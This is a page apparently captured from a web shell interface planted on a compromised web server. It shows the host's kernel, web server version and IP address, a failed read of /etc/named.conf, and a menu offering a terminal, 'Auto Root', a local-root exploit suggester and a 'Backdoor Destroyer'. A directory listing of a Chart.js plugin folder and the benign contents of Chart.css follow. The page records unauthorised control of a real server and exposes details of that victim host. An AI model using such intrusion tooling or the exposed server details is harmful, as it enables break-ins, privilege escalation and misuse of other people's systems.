Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.223.162.245
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
public /
plugins /
chart.js /
Delete
Unzip
Name
Size
Permission
Date
Action
Chart.bundle.js
580.06
KB
-rwxrwxr-x
2022-12-15 15:03
Chart.bundle.min.js
221.19
KB
-rwxrwxr-x
2022-12-15 15:03
Chart.css
811
B
-rwxrwxr-x
2022-12-15 15:03
Chart.js
432.72
KB
-rwxrwxr-x
2022-12-15 15:03
Chart.min.css
521
B
-rwxrwxr-x
2022-12-15 15:03
Chart.min.js
169.02
KB
-rwxrwxr-x
2022-12-15 15:03
Save
Rename
/* * DOM element rendering detection * https://davidwalsh.name/detect-node-insertion */ @keyframes chartjs-render-animation { from { opacity: 0.99; } to { opacity: 1; } } .chartjs-render-monitor { animation: chartjs-render-animation 0.001s; } /* * DOM element resizing detection * https://github.com/marcj/css-element-queries */ .chartjs-size-monitor, .chartjs-size-monitor-expand, .chartjs-size-monitor-shrink { position: absolute; direction: ltr; left: 0; top: 0; right: 0; bottom: 0; overflow: hidden; pointer-events: none; visibility: hidden; z-index: -1; } .chartjs-size-monitor-expand > div { position: absolute; width: 1000000px; height: 1000000px; left: 0; top: 0; } .chartjs-size-monitor-shrink > div { position: absolute; width: 200%; height: 200%; left: 0; top: 0; }